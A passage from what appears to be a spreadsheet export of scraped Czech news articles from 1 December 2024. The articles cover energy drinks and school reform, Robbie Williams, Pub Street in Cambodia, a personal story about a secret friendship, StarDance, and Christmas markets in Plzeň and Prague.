noci děti dnes tráví na sociálních sítích, rodiče to netuší. Děti ráno přijdou do školy a usínají nám tam. Když jsme zjišťovali, proč to tak je, tak kvůli tomu, že nespí. Chodí spát třeba ve čtyři hodiny ráno. A protože dítě ve škole usíná, tak si ráno koupí energy drink, aby bylo schopné vůbec fungovat. Když se studentů ptám, jak spí, tak obrovské procento dětí spí méně než šest hodin. Zásadní jsou ty poruchy spánku. Máme obrovský nárůst dětí s úzkostmi, depresemi, sklony k sebepoškozování. Nemůžeme říct, že je to jednoznačně vinou energy drinků nebo sociálních sítí, je to kombinace víc věcí. Musí to být kombinace všeho. Nejde spoléhat jen na osvětu. Věřím, že osvěta ve školách je, ale to je jen jedna část. Máte vliv vrstevníků, reklam, rodiny. Je potřeba osvěta a edukace všech, i dospělých. Ale v kombinaci s regulací. Tomu bohužel nezabráníte. Nikdy nepokryjete sto procent. Ale i to, že si děti nápoj nebudou moci koupit v obchodě a nebudou ho moct konzumovat na školních akcích a na veřejnosti, pomůže. Doufám, že se časem ukáže, že zákaz a fungoval a že se konzumace sníží. Jasně, že s tím nesouhlasí. Budou říkat, že dělají osvětu a necílí na děti, ale všichni víme, jak to je. A jestli jsou energetické nápoje návykové? Je v nich kofein. A ten je, stejně jako tein, návyková látka. Pokud ho konzumuje dospělý člověk, tak jeho organismus už má nějakou odolnost. Pokud ho konzumuje 12leté dítě, tak samozřejmě závislost na kofeinu i cukru může vzniknout. Problematické také je, že děti často energy nápoje kombinují s alkoholem nebo kratomem, a to je násobný negativní účinek. To prosazoval ministr zdravotnictví Vlastimil Válek (TOP 09). Jako pravicový politik nejsem úplně ztotožněná s tím, že máme řešit vše, co je nezdravé a škodlivé pro společnost. Vnímám svobodu a vlastní zodpovědnost každého jedince. Pokud se zdravý člověk rozhodne, že se bude ládovat cukrem a do toho kouřit, je to jeho osobní rozhodnutí. Ale chtěla bych, aby se podílel na nákladech, které jsou spojeny s důsledky jeho nezdravého životního stylu. To se teď neděje a jako ODS budeme prosazovat, aby nějaká participace lidí třeba i na zdravotním pojištění byla. Jinak to ale vnímám ve vztahu k dětem. Děti jsou zranitelnější skupinou, nemají tolik informací, jsou ve spotřebitelském řetězci slabším článkem. V nějaké míře bych si to dokázala představit, způsobů je více – spotřební daň, DPH. Fakt je ten, že obezita mezi malými dětmi obrovsky stoupá. Dnes když se podíváte na třídu na základní škole, tak to není třída štíhlých sportovních dětí. To je třída otylých, nemotorných mladých lidí, kteří se bojí rozeběhnout. Těch důvodů je strašně moc a je to velmi komplikovaná debata. Jezdíme více auty, nechodíme pěšky, stravujeme se nezdravě, málo se pohybujeme, jsme hodně na sociálních sítích. Potom máme úzkosti, rozhodovací paralýzu, řešíme to prášky. Není jedna věc, která to změní. Měli bychom změnit vnímání sama sebe, svojí role ve společnosti. Ale to je nesmírně těžký úkol a žádná vláda nemá nástroje, aby to změnila. Zásadní změny ve školství Je to úplný úlet. Buď se pan Hřib chtěl zviditelnit, anebo ukázal naprostou neznalost školského prostředí. Každý rozumný člověk vnímá, že ministerstvo školství je zastřešující organizace vzdělávání. Kdyby platilo, co chce pan Hřib, tak bychom tady měli 14 různých vzdělávacích systémů, které by byly neřízené, nekoordinované, každý kraj by měl jinou strukturu vzdělávání. Je to naprostý nesmysl. Ještě nejsme u konce. Chystají se poměrně zásadní změny ve školském zákoně. Ale je fakt, že změny, které prosazuji já, v něm obsaženy nejsou. Potřebují delší přípravu. Navrhuji zkrácení základní školní docházky na osm let a prodloužení povinné školní docházky o dva roky, ruku v ruce zároveň. K tomu je ale potřeba ještě odborná široká diskuze. Je pravda, že děláme jen kosmetické změny. Školství je postaveno na třech pilířích – lidi, obsah a systém. My měníme podmínky pro učitele, opečováváme lidské zdroje. Měníme i obsah, teď se dělá revize rámcových vzdělávacích programů. Ale 30 let jsme nesáhli na systém. Je potřeba sáhnout do architektury a prodloužit povinnou školní docházku. A proč se za tři roky nic nestalo? Na to je jednoduchá odpověď. Protože se tady často měnili ministři. Během čtyřletého období se ministři střídali jak panáci na orloji. Je. Premiér nebude zasahovat do toho, koho si jednotlivé politické strany nominují. Nejdříve to byl pan Gazdík, pak pan Balaš, pak pan Bek. Nebyla tady kontinuita. To, co dnes říká pan ministr Bek, je někdy i v rozporu s tím, co si představovali pan Gazdík či Balaš. Starostové promrhali potenciál, který jim byl dán. Kdyby tady byl jeden ministr, věřím, že bychom byli dál. redaktorka FTV Prima , CNN Prima NEWS Autor: Barbora Zykmundová Autor person Barbora Zykmundová</t>
  </si>
  <si>
    <t>20241201_174_3475971956_9febcf72dddcd32d1469.html</t>
  </si>
  <si>
    <t>9febcf72dddcd32d1469</t>
  </si>
  <si>
    <t>Nová aplikace se slevami a král barů, který musel škrtat</t>
  </si>
  <si>
    <t>20241201_175_3475917515_c31cc3fca0306092d83c.html</t>
  </si>
  <si>
    <t>c31cc3fca0306092d83c</t>
  </si>
  <si>
    <t>Temná minulost Robbieho Williamse: Promluvil o vynuceném potratu i boji s hvězdným kolegou</t>
  </si>
  <si>
    <t>Temná minulost Robbieho Williamse : Promluvil o vynuceném potratu i boji s hvězdným kolegou V roce 1998, když se Robbie Williams a Nicole Appletonová, tehdy členka populární skupiny All Saints , dozvěděli, že čekají dítě, byla to údajně pro zpěváka chvíle naděje a nového začátku. „Položil jsem ruku na její břicho a řekl jí: ‚To dítě mi zachraňuje život,‘“ vzpomíná podle deníku The Sun Williams. Jenže jejich štěstí netrvalo dlouho. ČTĚTE TAKÉ: Poslední vůle Freddieho Mercuryho . Jeho blízký prozradil, kde skončilo jmění hvězdy Queen Nicole, tehdy ve čtvrtém měsíci těhotenství, čelila obrovskému tlaku ze strany svého nahrávacího studia, které se obávalo dopadu mateřství na její kariéru. Nakonec se proto rozhodla pro potrat. „Byla donucena k potratu našeho dítěte. Je to drsné a bolestivé,“ přiznal Robbie . „Já jsem ji k tomu nenutil, ale byl jsem zatraceně špatný přítel. Navíc na vrcholu své závislosti a alkoholu ,“ dodal při premiéře svého biografického filmu Better Man. Tento moment patří dle jeho slov i k nejbolestivějším kapitolám jeho života: „Tohle je nejtěžší část filmu pro mě.“ Láska a pád ikonického páru Robbie a Nicole tvořili v 90. letech jeden z nejsledovanějších párů britské hudební scény. Seznámili se v roce 1997 na natáčení pořadu Top of the Pops a rychle se do sebe zamilovali. Robbie dokonce Nicole požádal o ruku po telefonu během turné. „Snažil jsem se přesvědčit sám sebe, že jsem připraven přijmout závazek, ale nebyl jsem,“ přiznal v dokumentu. Po potratu se vztah rychle rozpadl. Robbie , tehdy zápasící se závislostmi a tlakem slávy, nebyl schopen Nicole nabídnout potřebnou oporu. Nicole nakonec našla útěchu u Liama Gallaghera , tehdejšího frontmana kapely Oasis , se kterým v roce 2000 přivítali na svět syna Genea. Spor s Liamem Gallagherem Tento vztah ale přinesl do příběhu Robbieho a Nicole další drama. Napětí mezi zpěváky eskalovalo na Brit Awards v roce 2000, kde Robbie veřejně vyzval Liama k boxerskému souboji. „Uděláš to, nebo budeš srab?“ pronesl tehdy Robbie na pódiu, což vyvolalo na britské hudební scéně velký poprask. Nicole a Liam se nakonec v roce 2008 vzali, manželství však poznamenaly problémy a v roce 2013 skončilo po odhalení Liamovy nevěry. Film Better Man Nicole, kterou ve snímku ztvárnila herečka Raechelle Bannová, sama schválila scénář a podpořila premiéru. „Je neuvěřitelně statečná, že dovolila, aby byla tato část příběhu odvyprávěna,“ uvedl Williams na adresu své bývalé přítelkyně. Na červeném koberci se Nicole objevila v doprovodu své sestry a manžela Stephena Hainese. „To byl večer! Emocionální horská dráha,“ napsala na svém Instagramu. Robbie v souvislosti s filmem mluví o naději na uzdravení a odpuštění. „Doufám, že toto bude uzdravující zkušenost pro mě i pro Nicole,“ řekl. Po více než 20 letech abstinence a se čtyřmi dětmi po boku Robbie říká, že našel smysl života a klid. „Díky mé manželce Ayde a dětem se každý den zlepšuji. Bez ní bych tady už nebyl,“ přiznal. Film Better Man je nejen svědectvím o složitém životě jedné z největších hvězd britské hudební scény, ale také o odvaze otevřít se a čelit minulosti. „Na tuto noc jsem v životě nejpyšnější,“ řekl Robbie a vystoupení na premiéře zakončil písní My Way. Williams je mimochodem ve filmu vyobrazen také jako opice, což má symbolizovat jeho vnímání své vlastní kariéry. Tento vizuální prvek podle deníku Daily Mail odráží jeho pocit, že během své kariéry byl často vnímán jako cvičená opice, byl neustále pod tlakem a neměl kontrolu nad svým životem. MOHLO VÁM UNIKNOUT: Snowboard a lyže vyměnila za noty. Ester Ledecká natočila vánoční duet s Markem Ztraceným</t>
  </si>
  <si>
    <t>20241201_176_3475962458_dfbf030cbe61ae643c81.html</t>
  </si>
  <si>
    <t>dfbf030cbe61ae643c81</t>
  </si>
  <si>
    <t>Nejšílenější ulice v Kambodži je Pub Street. Prý za to může Angelina Jolie</t>
  </si>
  <si>
    <t>Nejšílenější ulice v Kambodži je Pub Street. Prý za to může Angelina Jolie close Topi_Piqula / Topi Pigula Topi Pigula 1. 12. 2024 clock 3 minuty video Pub Street je šílená. Extrémně hlučná, plná alkoholu , kýče a snahy vydělat. Z kdysi nudné ulice vzniklo centrum hospod poté, co Angelina Jolie proslavila nedaleké ruiny ve filmu Tomb Raider. Video: Nejšílenější ulice v Kambodži je Pub Street. Prý za to může Angelina Jolie Pub Street je šílená. Extrémně hlučná, plná alkoholu , kýče a snahy vydělat. Z kdysi nudné ulice vzniklo centrum hospod poté, co Angelina Jolie proslavila nedaleké ruiny ve filmu Tomb Raider. Kambodža byla země extrémně nebezpečnou a extrémně uzavřenou. Vládli a vraždili v ní komunističtí Rudí Khmérové a neexistovali nic, co by se dalo nazvat turistickým ruchem v dnešním slova smyslu. Člověk mohl být, a mnohdy byl, popraven jen proto, že nosil brýle, tedy mohl umět číst a být vzdělaný, což je něco, co si režim rozhodně nepřál. Anghor CO? Dnes slavná a turisty vyhledávaná Hospodská ulice (Pub Street) původně začínala se třemi restauracemi na skromném úseku polní cesty v centru města. Angkor WHAT? Bar tohoto jména byl prvním klubem, který na ulici otevřel své brány v roce 1998, těsně následován v srpnu 2000 dnes již zavřenou restaurací „Singaporean Asian Rooftop“ a restaurací Red Piano. Víc krys než turistů Později přišly další kluby, podniky, hospody, bary a nenápadné vykřičené domy (ano, doptáte se se na ně, pokud se budete pídit po masážních klubech). Jeden z dlouhodobých imigrantů žijících v Siap Reapu konstatoval, že pamatuje doby, kdy obývalo Pub Street více krys než turistů. Kolem roku 2005 byla ulice vydlážděna, což znamenalo, že do ní mohli vkročit i lodičky a botky, které se i s nohama stavěly na odiv. Ubylo pohorek a sandálů, ale přibylo naditějších peněženek. Související články gallery 8 video Tomb Raider Zlé jazyky tvrdí, že za úspěchem Pub Street stojí úspěch filmového trháku Angeliny Jolie „Tomb Raider“, ve kterém byly představeny majestátní chrámy Angkoru . Pravdou je, že podobné věci se skutečně dějí a filmová turistika funguje. Podobnou službu, která ne vždy vede ke kladným koncům, udělá i zařazení místa na Seznam světového kulturního dědictví UNESCO. Naláká lidi a změní místo k nepoznání. Někde se s tím vyrovnají s grácií, ale v Siam Reapu to pojali extrémně komerčně. Toto je Pub Street. Zdroj: Youtube Tom Raider byl natočený roku 2001 proslavil nedaleké ruiny Angkor Watu a přilákal tam další turisty a město Siam Reap nabízelo ubytovací, volnočasové i zábavní možnosti. Od paříren, kde vám namíchají cokoli, si vzpomenete až po divadlo s „ladyboys“, tedy muži, které se od místních krásek na první pohled liší jen tím, že jsou atraktivnější. Noční život Jestli byste si něco nepřáli, tak na Pub Street vlastnit byt a muset v něm bydlet. Zatímco dopoledne, tak zhruba do desíti, než se začnou probouzet první podniky, s prodlužujícími se stíny roste halas, který se se tmou mění na vskutku nepříjemný kravál. Jako by podniky mezi sebou závodily, který hudbou přeřve svého souseda. Noční život rozprostírá do dvou paralelních uliček, známých jako „The Lane“ (nacházející se severně od Pub Street) a „The Passage“ (nacházející se jižně od Pub Street). Naháněči se vás snaží dostat do „svého“ podniku. Pokud hledáte lid a autenticitu, tak jste na úplně špatném místě. Tady dostanete německé pivo , italskou kávu a ano, pokud chcete, tak i smaženého pavouka. Ale místní je nejedí, je to jen vzpomínka na dobu komunistické vlády, kdy v době extrémní nouze byl smažený sklípkan vítaným zdrojem bílkovin. Zdroje: Rubrika transition_slide Zážitky</t>
  </si>
  <si>
    <t>22160</t>
  </si>
  <si>
    <t>20241201_177_3475910328_1c88a02eb84873ce8f1c.html</t>
  </si>
  <si>
    <t>1c88a02eb84873ce8f1c</t>
  </si>
  <si>
    <t>Petra (41): Za manželovými zády se scházím s jiným mužem. Není to ale tak, jak si všichni myslí</t>
  </si>
  <si>
    <t>Petra (41): Za manželovými zády se scházím s jiným mužem. Není to ale tak, jak si všichni myslí Petra poznala muže, se kterým si skvěle rozumí a společně se zasmějí. Bere ho jako kamarádku. Tak o něm ostatně mluví před manželem, když se mají sejít. Nerada lže, ale její muž by Petřino nové přátelství těžko pochopil. Vláďa (40) je bezva chlap. Rozumíme si jako staří přátelé, ačkoliv jsme se potkali teprve nedávno a zapovídali se u svařáku. Manželovi bych pravdu neřekla, nechápal by to. S Vláďou se scházíme ve vší počestnosti a budeme v tom pokračovat, i když mě trochu hlodá svědomí. Mohlo by Vás zajímat: Katka (29): Přítel si udělal důvěrnici ze své platonické lásky. Sděluje jí i to, jak často kojím Potkali jsme se ve frontě na balíčky V těch dnech jsem chodila denně na poštu, chtěla jsem se vyhnout předvánočnímu shonu , ale moc se mi to nedařilo, asi jsem nebyla jediná, kdo se pustil s předstihem do nákupů. Všude byly fronty a já se v jedné z nich zase potila v péřové bundě. Za mnou se ozvalo legrační zvonění na mobilu, dětská písnička ze známého kresleného seriálu. Příjemce hovoru zněl poněkud nervózně. " Malá mi nahrála do mobilu zvonění, nechápu, jak to dělá," řekl hned na úvod volajícímu a taky asi lidem ve frontě . Mě to náhodou pobavilo. Sama dobře vím, jak jsou dnes i malé děti šikovné, co se týče mobilních telefonů. Když domluvil, dala jsem se s ním do řeči. Chtěla jsem přerušit trapné ticho. "Já zas měla na displeji věčně prasátko Peppu a pak Spongeboba," řekla jsem chápavě . Krátili jsme si dlouhou chvíli povídáním a pak se stalo, že jsme si omylem zaměnili téměř stejně velké balíčky . Muž mě musel na ulici dohnat, abychom si je vyměnili. Stáli jsme přímo před zastávkou tramvaje vedle okénka, z něhož lákavě vonělo svařené víno . Mohlo by Vás zajímat: Dominika (40): Manžel si o nevěru řekl sám. Kašle na ložnici, veškerý čas a energii věnuje politice Scházíme se tajně a ve vší počestnosti Sice jsme jeli každý jiným směrem, ale zkrátili jsme si čekání na tramvaj jedním svařákem. Moc hezky jsme si popovídali na téma výchova . Jsem dětská fyzioterapeutka a Vláďa pediatr. Měli jsme tedy společná témata a netočila se jen kolem naší práce. Bylo osvěžující se bavit s mužem, co vás poslouchá. Doma je to občas náročné, s manželem se kolikrát po těch letech ani nevnímáme nebo diskutujeme jen o praktických záležitostech kolem dětí a domácnosti. Je pravda, že nám s Vláďou nakonec ujelo několik tramvají a vyměnili jsme si čísla. Doma jsem ve večerním shonu na vše zapomněla a Vláďa se mi připomněl až o týden později. Napsal mi, že jde pro změnu pro balíček a jestli mě na poště také něco nečeká. Balíček jsem tam neměla, přesto jsme se sešli. Tentokrát jsme si sedli do kavárny . Manželovi jsem napsala, že jdu na kus řeči s kamarádkou. Nechtěla jsem rozebírat detaily a pak vysvětlovat, že chodím s cizím chlapem na kafe a nejde o rande. Nebyla jsem daleko od pravdy, s Vláďou jsem se vážně cítila jako s kámoškou. Nezavřeli jsme pusu, smáli jsme se, jako bychom se znali roky. Musím říct, že mě okouzlil jeho smysl pro humor. Vláďa si ze sebe umí dělat legraci, to mi vždy na lidech imponovalo. Pak mu zazvonil telefon, mrkl na něj a hovor nepřijal. Vytušila jsem, že oba našim polovičkám lžeme, přestože o nic nejde. Jak by se ale tvářily, kdyby věděly pravdu? Jistě by nás podezíraly minimálně z nějakých postranních úmyslů. Mohlo by Vás zajímat: Milena (42): Manžel je děsný cholerik. Jednu malou lež o setkání s kamarádem mi vyčítá už tři roky Neprovádíme nic nekalého, přesto mě hryže svědomí S Vláďou se chystáme po Novém roce na koncert, žádný z našich blízkých není blázen do jazzu jako my. Nedokážu manželovi přiznat, že jsem potkala fajn kamaráda. Nepochopil by to. Přesto si nemyslím, že děláme něco zlého. Nejde o flirt, ačkoliv Vláďa je pěkný chlap. Jen si prostě rozumíme a nemáme potřebu doma vysvětlovat detaily. Kdyby nás někdo potkal a dostalo se to k manželovi, řeknu, že je to kolega z práce. Netvrdím ale, že nemám špatné svědomí , když lžu. Další příběhy ze života → Mohlo by Vás zajímat: Eva (32): Ze strachu o vztah jsem si vymyslela malou lež. Netušila jsem, jaké to bude mít následky Text byl zpracován na základě skutečného příběhu, fotografie je jen ilustrační. Máte podobnou zkušenost? Svěřte se nám se svým příběhem, napište na redakce@lifee.cz . Marta Jandová obětovala rakovině prsa, vaječníky i šanci na druhé dítě: Nechtěla jsem umřít jako bratr a maminka Autor: Michaela Hájková Autor person Michaela Hájková</t>
  </si>
  <si>
    <t>20241201_178_3475893587_a3a5c76c22dac48b8d6e.html</t>
  </si>
  <si>
    <t>a3a5c76c22dac48b8d6e</t>
  </si>
  <si>
    <t>StarDance: Na krajíčku měla i&amp;nbsp;Tatiana Drexler, parketu opět kraloval Oskar Hes, vypadla Lucie Vondráčková</t>
  </si>
  <si>
    <t>StarDance: Na krajíčku měla i&amp;nbsp; Tatiana Drexler , parketu opět kraloval Oskar Hes , vypadla Lucie Vondráčková Osmé kolo StarDance přineslo další vyřazování a soutěž opustila nečekaně zpěvačka a herečka Lucie Vondráčková . O dojemné momenty nebyla nouze a bylo to i díky tomu, že páry předvedly dvě taneční čísla, z nichž jedno bylo ve stylu contemporary. Článek Následuje obsah vložený z jiného webu. Zde jej můžete přeskočit. Přejít před obsah vložený z jiného webu. Článek si také můžete poslechnout v audioverzi. Minulé kolo nikdo nevypadával a večer byl věnovaný Centru Paraple , které pomáhá handicapovaným osobám. Páry si mohly tak oddechnout a sbírat body, které se jim přičítali do včerejšího skóre. Jak soutěž postupuje, vystoupení jsou samozřejmě čím dál lepší a propracovanější. Pět párů předvedlo slowfox, quickstep a cha-chu. V druhém kole si navíc každý z nich zatančil ve stylu contemporary. Se scénickým tancem, který bere inspiraci ze všech možných stylů, pomáhal Václav Kuneš , který usedal několik let v porotě StarDance a je zakladatelem tanečního souboru 420PEOPLE. Jaké zajímavé a dojemné momenty přinesl včerejší taneční večer na pražském Výstavišti? Rozhovory 18. 11. 2024 Adriana Mašková o trémě Filipa Blažka , lásce ke StarDance i o hodnocení poroty, které občas zabolí Odhalila svoji duši I přes nádherná taneční čísla, ze která si vysloužili tři desítky, vypadla v osmém kole zpěvačka a herečka Lucie Vondráčková s tanečním partnerem Lukášem Bartuňkem . „Zkušenost je nepřenosná a nádherná. Tanec miluju,“ řekla v závěrečné řeči. Prvním tancem večera byl slowfox, druhým contemporary na Píseň samotářky z Bídníků, kterou si Lucie užila na 100 %. „Byl to váš nejkrásnější tanec. Měla jsem pocit, že vidím vaši duši,“ řekla na její konto Tatiana Drexler . &amp;gt;&amp;gt;&amp;gt; Lucie Vondráčková : První slova po vypadnutí ze StarDance Foto: Česká televize, Mikuláš Křepelka +11 Podpora od prince Williama „Na začátku bych neřekla, že mi bude tancování chybět, ale je to tak,“ řekla po prvním vystoupením sympatická kickboxerka, jejíž zlepšování je vidět v každém kole. S partnerem Dominikem Vodičkou zatančili hravý quickstep, druhé kolo ale bylo tématem náročnější. Vybrali si kyberšikanu: „Každý problém se dá překonat a je důležité zůstat silný, ať je situace jakákoliv,“ vysvětlovala Martina , která se tématu věnuje, protože si šikanou sama prošla. Její vystoupení bylo úžasné a porota zůstala oněmělá. „Zahoďte střevíce, hoďte za hlavu slowfox, cha-chu a dělejte tohle. Jste tancem nepolíbená a to, co předvádíte, je skvělé,“ chválil Richard Genzer . Marek Eben v začátku přenosu zmínil, že Martina obdržela před lety dopis z Buckinghamského paláce. Bylo to díky jejím vztahům s britskou ambasádou v Praze a dostalo se jí uznání od samotného prince Williama . Přesně znění dopisu nemohla prozradit, ale v rozhovoru pro časopis Vlasta řekla, že v něm stálo, že úspěchy Martiny a jejího bratra jsou pozoruhodné, a že je bude nadále sledovat. Smích od ucha k uchu Pozitivní dávku, nebo spíše uragán energie přenesl na diváky opět spisovatel Patrik Hartl . S partnerkou Terezou Pruckovou zatančili dynamickou cha-chu. V podobném, hravém duchu byl i jejich scénický tanec. Tanečnice vysvětlila, že příběh by zněl asi jako „když si úředníci z korporátu jdou zatančit do ulic, aby se uvolnili“. Patrik Hartl ještě dodal, že po zkoušení contemporary čísla má stehnech samé modřiny - choreografie totiž zahrnovala spoustu energických úderů do rukou i nohou. Kouzelná atmosféra Jak pohyb může být výmluvnější než-li slovo, komentovala Tereza Kostková scénický tanec dvojice Marty Dancingerové a Martina Prágra. Tančili na známou píseň z filmu Amélie z Montmartru (2001) a není divu, že porota nešetřila body - padly tři desítky. Nižší hodnocení sice získali za slowfox, ale kombinace ladných pohybů, bílých šatů, kouře a světel v publiku byla dokonalá. Pomalejší standardní tanec zatančili na píseň Bude mi lehká zem od Jany Kirschner a Petra Hapky. Dojetí se nedalo skrývat Ostrou a dynamickou cha-chu na song Outta Love od Anastacie předvedl Oskar Hes s Kateřinou Bartuněk Hrstkovou. Nechyběly opět efektní figury, které u nich má publikum tak rádo! Jejich contemporary vystoupení mělo skrze tanec vyjádřit podporu všem, kteří bojují s jakoukoliv závislostí, ať je to alkohol , drogy nebo třeba mobil. Působivé číslo na píseň Kříž od Davida Stypky dojalo opět Oskarovu maminku a na krajíčku měla i porotkyně Tatiana Drexler : „On je neuvěřitelný umělec. Bylo to fantastické,“ řekla na konto Oskara . S Terezou Kostkovou řešili v backstage i vtipná videa, které Oskar Hes natáčí s kolegy na svoje sociální sítě. Podívejte se sami: View this post on Instagram A post shared by Oskar Hes (@oskar.hes) Bodové hodnocení párů za 7. a 8. večer StarDance: Pár Tanec Body od poroty Marta Dancingerová a Martin Prágr slowfox 86 Oskar Hes a Kateřina Bartuněk Hrstková cha-cha 86 Lucie Vondráčková a Lukáš Bartuněk Slowfox 83 Patrik Hartl a Tereza Prucková cha-cha 72 Martina Ptáčková a Dominik Vodička quickstep 65 Tento víkend žil nejen tancem, ale i hudbou - v pátek se předávali ceny Český slavík. Kdo bodoval i na poli módy? Lucie Vondráčková a Lukáš Bartuněk během contemporary vystoupení Porota byla z tohoto čísla okouzlena Pár předvedl quicsktep na song Singing in the rain Sice tančili skvěle, ale k postupu to nestačilo! Martina Ptáčková a Dominik Vodička svým scénickým tancem okouzlili, tématem byla kyberšikana Jejich quickstep byl oproti tomu hravější Dominik Vodička a Martina Ptáčková postupují do dalšího kola Patrik Hartl ve svém živlu - s Terezou Pruckovou zatančili cha-chu Se stejným nadšením předvedli i jejich druhé číslo ve stylu contemporary Cha-chu si zatančili i Oskar Hes s Kateřinou Bartuněk Hrstkovou Ještě větší ohlas ale mělo jejich druhé contemporary vystoupení Marta Dancingerová s Martinem Prágrem zatančili slowfox Atmosféra byla nádherná i díky tomu, že publikum rozsvítilo mobily Jejich druhé vystoupení chytlo za srdce, tančili na píseň Comptine D' un Autre Ete, která pochází z filmu Amélie z Montmartru Na osmý večer se přišly podívat i bývalé účastnice StarDance, například herečky Jitka Schneiderová nebo Marika Šoposká Autor: Lucie Švirková Autor person Lucie Švirková</t>
  </si>
  <si>
    <t>605410</t>
  </si>
  <si>
    <t>489690</t>
  </si>
  <si>
    <t>20241201_179_3475927448_47b440c0071b7cb8757e.html</t>
  </si>
  <si>
    <t>47b440c0071b7cb8757e</t>
  </si>
  <si>
    <t>Pivovárek Dobrá kára | České pivo</t>
  </si>
  <si>
    <t>Pivovárek Dobrá kára | České pivo Historie a současnost pivovárku Dobrá kára Žádné informace o pivovaru. 768 21 Kvasice Zlínský kraj 2024 Jiří Dobrovský +420 775 586 651 18036961 Uvedené údaje určené pro obchodní styk jsou získané z veřejně dostupných zdrojů - stránek pivovaru, obchodního rejstříku nebo od zástupce pivovaru. Hodnocení: Autor: Vokounek</t>
  </si>
  <si>
    <t>648</t>
  </si>
  <si>
    <t>401</t>
  </si>
  <si>
    <t>20241201_18_3479223746_0c5df07086109647aba9.html</t>
  </si>
  <si>
    <t>0c5df07086109647aba9</t>
  </si>
  <si>
    <t>Plzeňské náměstí rozzářil vánoční strom, přihlížely tisíce lidí - FOTKY</t>
  </si>
  <si>
    <t>Plzeňské náměstí rozzářil vánoční strom, přihlížely tisíce lidí - FOTKY 1. 12. 2024 Plzeň má vlastní vánoční stromeček. Foto: Město Plzeň První adventní neděle přilákala do centra Plzně davy lidí. Přesně v 18:01 se za bouřlivého odpočítávání poprvé rozzářil vánoční strom na náměstí Republiky . Slavnostní chvíle přilákala tisíce lidí, kteří zaplnili celé náměstí. Letošním symbolem Vánoc se stal šestnáct metrů vysoký stříbrný smrk pichlavý, který původně rostl v Hřbitovní ulici v městské části Doubravka. Strom musel být pokácen, protože již přerostl okolní zástavbu a jeho husté větve se dotýkaly fasády domů. Foto: Město Plzeň „Vánoční strom v Plzni každoročně patří mezi nejhezčí v republice. Věřím, že tomu tak bude i v tomto roce," uvedl primátor Plzně Roman Zarzycký. Slavnostnímu rozsvícení předcházel bohatý kulturní program, který začal již v 16 hodin. A musíme dodat, že bylo o zábavu skutečně postaráno, lidé se bavili, zpívali, tančili a popíjeli svařené víno . Kromě toho si všichni mohli za příjemné atmosféry užít hudební a taneční program v podání pěveckého sboru a baletního souboru Divadla J. K. Tyla. V Plzni má smrk jako symbol Vánoc pevné místo. Za posledních 32 let se objevil na náměstí celkem pětadvacetkrát. Vánoční strom se během první adventní neděle rozsvítil nejen na Náměstí Republiky , ale také v městské části Slovany . Foto: Město Plzeň Součástí slavnostního zahájení adventu bylo i vypravení vánoční tramvaje, která poprvé vyjela v 16:20. Na náměstí Republiky současně probíhají tradiční vánoční trhy, které přispívají k vytvoření pravé sváteční atmosféry. Foto: Město Plzeň Naše redakce samozřejmě byla na místě a vyzpovídala i některé obyvatele Plzně , kteří dorazili, aby si tento slavnostní okamžik užili. A co na to Plzeňané říkají? „Miluji adventní období a každý rok chodíme, protože je to rodinná tradice,“ řekla jedna z přítomných. „Máme děti, vyrazíme s rodinou, dáme si svařené víno , užijeme si koledy, atmosféru. Je to takové symbolické,“ dodala jiná místní obyvatelka. Zdroje: autorský text Autor: Michaela Hanelová Autor person Michaela Hanelová</t>
  </si>
  <si>
    <t>20241201_180_3475874183_81a3bfaa81a2b4855525.html</t>
  </si>
  <si>
    <t>81a3bfaa81a2b4855525</t>
  </si>
  <si>
    <t>Trhy na Staroměstském náměstí přilákaly tisíce lidí, policie uzavřela vstup</t>
  </si>
  <si>
    <t>Trhy na Staroměstském náměstí přilákaly tisíce lidí, policie uzavřela vstup Na Staroměstském a Václavském náměstí v Praze v sobotu začaly vánoční trhy. Staroměstské náměstí odpoledne zcela zaplnily tisíce lidí, kteří se tam přišli podívat na první světelnou animaci vánočního stromu. Policie se proto rozhodla na náměstí už další lidi nepouštět a autům také uzavřela vjezd do přilehlé Pařížské ulice, informovala krátce před 17:00 na síti X. Na místě byla téměř stovka policistů. Stejně jako v předchozích letech město z bezpečnostních důvodů odmítlo jedno slavnostní rozsvícení vánočního stromu na Staroměstském náměstí . Místo toho mohou návštěvníci vidět zhruba dvouminutovou světelnou animaci, která se za doprovodu skladby Vltava Bedřicha Smetany opakuje každou hodinu od 16:30 do 21:30. Skladbou Vltava pořadatelé připomínají letošní 200. výročí od Smetanova narození. Už před otevřením stánků v 10:00 čekali na svařené víno a další občerstvení první návštěvníci. Ráno měli někteří prodejci naspěch, aby pro návštěvníky stihli otevřít včas. „Máme tady asi na 200 balení klobás," řekla ČTK například prodavačka ve stánku na Staroměstském náměstí . Ceny klobás jsou podle ní na podobné úrovni jako před rokem, svařené víno , které také nabízejí, zdražilo asi o deset korun. Na Staroměstské náměstí jezdí několik let. „Každý rok jsou tady na náměstí podobní lidé, dobře se známe," dodala. Zhruba deset let má stánek na Staroměstském náměstí také jeden z výrobců vánočních ozdob. „Každý rok obměňujeme nabídku. Letos tady máme asi 400 druhů ozdob, ceny jsou stejné," řekla ČTK prodavačka. Stánek s bramborovými lupínky na Václavském náměstí měl nachystanou zásobu 350 kilogramů brambor. „Na Staroměstském náměstí je o poznání větší provoz," uvedl prodavač. „Ale baví mě sem jezdit, je to zase něco jiného. Přes rok pracuju v pekárně,“ doplnil. Smrk, který pracovníci firmy Technologie hlavního města Prahy na Staroměstském náměstí vztyčili a upevnili v noci na úterý, vyrostl na soukromé zahradě v Krompachu nedaleko hranic s Německem a měří asi 20 metrů. Ozdobilo ho 340 koulí především v barvách pražské vlajky – tedy červené a žluté – a také 12 kilometrů světelných řetězů, což je o čtyři kilometry víc než loni. Vánoční trhy na Staroměstském náměstí byly několikrát zařazeny mezi nejhezčí na světě. Ocenily je například cestovatelský portál CNN Travel, listy USA Today i britský The Times. Další vánoční trhy mohou lidé v metropoli navštívit například na náměstí Míru , u Anděla nebo na náměstí Jiřího z Poděbrad . Výrobky z chráněných dílen nabídne od 2. prosince tržiště na náměstí Republiky . Tento charitativní trh organizuje spolek Sdružení Nového Města pražského. Autor: ČTK Autor ČTK Rubrika transition_slide Zpravodajství</t>
  </si>
  <si>
    <t>4710</t>
  </si>
  <si>
    <t>20241201_181_3484996455_e4a42bf50427f1b2fa43.html</t>
  </si>
  <si>
    <t>e4a42bf50427f1b2fa43</t>
  </si>
  <si>
    <t>Vánoční bezlepkový trh 7. 12. 2024 vystavovatelé</t>
  </si>
  <si>
